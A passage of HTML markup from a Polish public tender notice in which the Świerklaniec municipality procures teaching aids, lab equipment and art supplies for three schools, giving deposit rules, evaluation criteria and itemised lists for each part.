<b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Wykonawca, którego oferta zostanie oceniona, jako najkorzystniejsza, w celu wykazania spełniania warunków udziału w postępowaniu, zostanie wezwany do przedłożenia aktualnego na dzień złożenia wykazu dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; – zgodnie z załącznikiem nr 10 do SIWZ udostępnionym wykonawcy, którego oferta zostanie oceniona, jako najkorzystniejsza.Dla części I zamówienia należy przedłożyć wykaz co najmniej dwóch dostaw obejmujących pomoce dydaktyczne lub naukowe – każda dostawa o wartości min. 20.000 zł brutto.Dla części II zamówienia należy przedłożyć wykaz co najmniej dwóch dostaw obejmujących pomoce dydaktyczne lub naukowe – każda dostawa o wartości min. 3.000 zł brutto.Dla części III zamówienia należy przedłożyć wykaz co najmniej dwóch dostaw obejmujących pomoce dydaktyczne lub naukowe – każda dostawa o wartości min. 70.000 zł brutto.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: ​ 500 zł – dla części I zamówienia (Orzech), ​ 3000 zł – dla części III zamówienia (Świerklaniec). ​ Zamawiający nie wymaga zabezpieczenia wadialnego dla części II (Nakło). ​ Wadium musi być wniesione przed upływem terminu składania ofert.Wadium może być wnoszone w jednej lub kilku następujących formach: 1) pieniądzu; 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572). Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Świerklańcu nr rachunku: 47 8467 0001 0000 0026 2000 0003 z dopiskiem: Zakup materiałów pomocniczych do zajęć w ramach projektu "Doskonalenie kompetencji kluczowych uczniów w Gminie Świerklaniec" – część …….. </span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>wydłużenie okresu rękojmi</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"> 1. Zmiany postanowień zawartej umowy mogą nastąpić za zgodą obu Stron wyrażoną na piśmie, w formie aneksu do umowy zawierającego uzasadnienie faktyczne i prawne zmiany, pod rygorem nieważności. Zmiany umowy muszą być zgodne z treścią art. 144 ust. 1 Prawa zamówień publicznych. 2. Każda ze stron jest uprawniona do wnioskowania o zmianę sposobu i zakresu wykonywanej umowy w sytuacji rozszerzenia lub zawężenia przez Zamawiającego zakresu przedmiotu umowy, czego nie można było przewidzieć w dniu zawarcia umowy, a niewykonanie których uniemożliwiałoby należyte wykonanie przedmiotu umowy. 3. W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn, określonych w ust. 2, Strona żądająca zmiany zobowiązana jest do niezwłocznego poinformowania o tym fakcie drugiej Strony i wystąpienia z wnioskiem o dokonanie wskazanej zmiany wraz z uzasadnieniem dokonania zmiany. 4. Jeżeli zmiana umowy wiąże się ze zmianą wysokości wynagrodzenia należnego Wykonawcy, Strona wnioskująca o zmianę jest zobowiązana przedstawić kalkulację tej zmiany. 5. Rezygnacja z określonego zakresu przedmiotu umowy wiąże się ze zmniejszeniem wynagrodzenia zgodnie z przedstawioną przez Wykonawcę wyceną. 6. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie Strony. 7. Jeżeli Zamawiający uzna, że zaistniałe okoliczności nie stanowią podstawy do zmian umowy, Wykonawca zobowiązany jest do realizacji zadania zgodnie z warunkami zawartymi w umowie.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-10-27</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>materiały do zajęć dla ZSP w Orzechu</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Matematyka. Egzamin ósmoklasistyOrtograffiti. Matematyka bez trudności.Zeszyty ćwiczeń różnePercepcja wzrokowaPercepcja słuchowa – książka i CDPercepcja wzrokowazestaw do zajęć terapeutycznychDyslektyczne ucho książkaDyslektyczne ucho - ćwiczeniaTymon rozumie innychĆwiczenia dla uczniów starszych klas szkoły podstawowej z zaburzoną percepcją wzrokowąKto słucha nie błądzi” Zadania doskonalące uwagę i pamięć słuchowąĆw. Na koncentrację i spostrzegawczość dla uczniów klas VII-VIIITabliczka mnożenia gra planszowa.-PikselkiSkoncentruj się” Wytęż wzrok i pamięć”Który wyraz jest poprawny?-Gumowe uchoDyktanda graficzneUszy do góryGra Simon AirPamięć dźwiękowa - gra„Wszystko słyszę”ćwiczeniaStrefa słuchu + płyta„Posłuchaj, pokaż, opowiedz” część IGóra uczuć – Gra Karty – sposoby na złość„Łamacz lodów”Dzwonki diatoniczne naciskaneBadam alternatywne źródła energiiElektryczność i magnetyzm-zestaw doświadczalnyBaterie AA komplet 4 sztBryły wielościany prawidłoweKomplet magnetycznych przyrządów tablicowych z tablicą do zawieszaniaprzyrząd do demonstrowania powstawania brył obrotowychTablica układ współrzędnych suchościeralnaZestaw do nauki rachunku prawdopodobieństwaPlansze interaktywneCyrkiel na tablicę - na magnesachKątomierz dwukierunkowyTwierdzenie Pitagorasa – zestaw demonstracyjnyBryły obrotoweMagnetyczne koła ułamkoweSześcian do demonstracji objętościTworzymy siatki graniastosłupów i ostrosłupów - zestaw demonstracyjny Rozdzielacz gruszkowyModele chemiczne grafit, diament, fulereny Modele kulkoweTrójnóg metalowySzczypce metaloweStatywZestaw kolb stożkowych z lejkiem Zestaw porcelanowych parownicZestaw butelek z wkraplaczamPalnik alkoholowyZlewki-zestawKrystalizatorSączkiSublimacja joduModel atomuPapierki wskażnikoweZestaw płytek ceramicznych do eksperymentów kroplowych Zestaw do przeprowadzania reakcji w roztworach wodnychPrzyrząd do obserwacji obrazu rzeczywistego w zwierciadle wklęsłymzwierciadło kuliste wklęsłe i wypukłekompas w obudowie metalowejzestaw do doświadczeń z elektrostatykiKamertonyWahadło matematycznePowstawanie obrazów w zwierciadle płaskimZasilacz bateryjny 6 Vminiaturowe igły magnetyczne na podstawkach elektromagneszestaw do doświadczeń z optyki geometrycznej Zestaw wady wzrokuelektroskop dwulistkowyelektrometr Braunazestaw sprężyn o różnym współczynniku sprężystości, ze wskazówką maszyna elektrostatyczna Wimshursta wizualizacja linii pola magnetycznego magnes podkowiasty soczewki dwuwypukła i dwuwklęsła pojemnik próżniowy z pompkązielony wskaźnik laserowy Żarówkiprzewody żarówki na podstawkach i wyłącznik opornik drutowy 10Woprawki do żarówek na wspólnej oprawcezasilacz bateryjnyopornica suwakowa 0 - 20WmiliamperomierzwoltomierzGotowy przyrząd do badania tarciaRura Newtona z gotową prożniąWózek do doświadczeń z mechanikizestaw bloczków ze statywamizestaw 10 obciążników 50g z dwustronnymi haczykamitrzy sześciany o jednakowej masieprzewodnictwo cieplne metali-wersja demonstracyjnapojazd odrzutowy z napędem elektrycznymmodel technicznej prasy hydraulicznejsiłomierz demonstracyjnyprzewodnictwo cieplne metaliwaga elektroniczna 2000g/1guniwersalny statyw o regulowanej wysokościkula Pascalametalowy haczyk na podstawie magnetycznejlewitujące magnesy na drewnianej podstawcezestaw do demonstracji zjawiska konwekcjipółkule magdeburskienaczynia połączonetermometr alkoholowydziesięć sześcianów do wyznaczania gęstości różnych materiałówZestaw do badania prawa Archimedesaprzyrząd do demonstracji przemiany pracy w energie wewnętrznąKoło MaxwellafartuchBryły ułamkowe magnetyczneBryły geometryczne wielościany nieregularne, ukośneZamawiający dopuszcza produkty równoważne względem tych, które zostały opisane ze wskazaniem na konkretny znak towarowy, markę, producenta, dostawcę, patent, pochodzenie, źródło lub szczególny proces charakteryzujący produkty lub usługi dostarczone przez konkretnego wykonawcę albo nastąpiło wskazanie norm, europejskich ocen technicznych, wspólnych specyfikacji technicznych lub innych odniesień.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39162000-5, 39162100-6, 39162110-9, 37524100-8, 22111000-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 14<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">wydłużenie okresu rękojmi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>materiały do zajęć dla SP w Nakle Śl.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamawiający dopuszcza produkty równoważne względem tych, które zostały opisane ze wskazaniem na konkretny znak towarowy, markę, producenta, dostawcę, patent, pochodzenie, źródło lub szczególny proces charakteryzujący produkty lub usługi dostarczone przez konkretnego wykonawcę albo nastąpiło wskazanie norm, europejskich ocen technicznych, wspólnych specyfikacji technicznych lub innych odniesień.zestaw plansz do j.niemieckiego z wskażnikiemLekcjoteka Matematyka dla klas 4-8program edukacyjny do matematykizastaw modeli brył rozkładanych z siatkamikalkulatorprzyrząd do demonstrowania powstawania brył obrotowychplansze dydaktyczneklocki Dienesa Percepcja wzrokowa. M.KorendoSzeregi i relacjeAkademia umysłu Uczeń EduZestaw kreatywny na start-wyprawkaWkład z papieru rysunk. A4Wkład z kolor.papieru rys.A4Papier wycinankowy 100 kartekBrystol A3Brystol 10 kolorów A4.Klej czarodz.500 mlPlastelina mix - 2,8 kg Farby temperoweKrepina mix. 15 kolorówKredki zestaw stolikowyKomplet nożyczek 10 sztZestaw pędzli 25 szt.Brystol biały A4 Brystol A3 białyBrystol A3 kolorowyPapier wycinankowy nabłyszczany 200 kartekKredki zestaw stolikowyFarby temperoweKlej czarodz.500 mlBrokat zestaw pudełkoPastele sucheWiszer - rozcieracz do pasteliFiksatywaWęgiel rysunkowyPlastelina kwadratowaModelina zestawGlina biała samoutwardzalnaMasa do modeliPapier ścierny kompletnarzędzia do modelowaniafarba do ceramikifarba do ceramikifarba do ceramikifarba do ceramikifarba do ceramikifarba do ceramikiZestaw do quillingu na cały rokAkwarele farby zestawBlok do akwareli A3Farby akryloweFarby plakatoweFarby akwarelowe brokatoweZestaw tuszy wodnychKredki akwareloweTekturaZestaw do origamiKlej do foliiFilcowe arkusze zestawIgły do filcowaniaPistolet do klejenia na gorąco i klejrelief do witrazyZestaw włóczek do filcowaniaZestaw bloków technicznychKartonZestaw pędzliPodręcznik zawierający zadania i ćwiczenia przygotowujące do międzynarodowego certyfikatu z języka niemieckiego FIT IN DEUTSCH na poziomie A1 1). Mit Erfolg zu Fit in Deutsch A1 UT LEKTORKLETT. Pakiet testów i ćwiczeń dla dzieci i młodzieży przygotowujących się do egzaminu Goethe-Institut Fit in Deutsch 1.Oferuje:trening czterech sprawności na poziomi A17 ułożonych tematycznie rozdziałów uwzględniajacych tematy wymagane do egzaminu.Dodatkowy komponent to podręcznik dla nauczyciela zawierający wyjasnienia zasad egzaminu i formularz odpowiedzi, rozwiązania i komentazre, transkrypcje nagrań, materiały do kopiowania, wskazówki do gier oraz jednojęzyczny słowniczek. PŁYTA CD x1 Mit Erfolg Zu Fit in Deutsch 1 CD 3). Mit Erfolg zum Goethe-Zertifikat A2: Fit in Deutsch to idealne przygotowanie dla dzieci i młodzieży do egzaminu Goethe-Zertifikat A2. Zeszyt ćwiczeń i testów zawiera: 4 jednostki tematyczne z ćwiczeniami i testami, wszystkie typy zadań do każdej części egzaminu: czytanie, słuchanie, pisanie i mówienie, liczne ćwiczenia ukierunkowane na 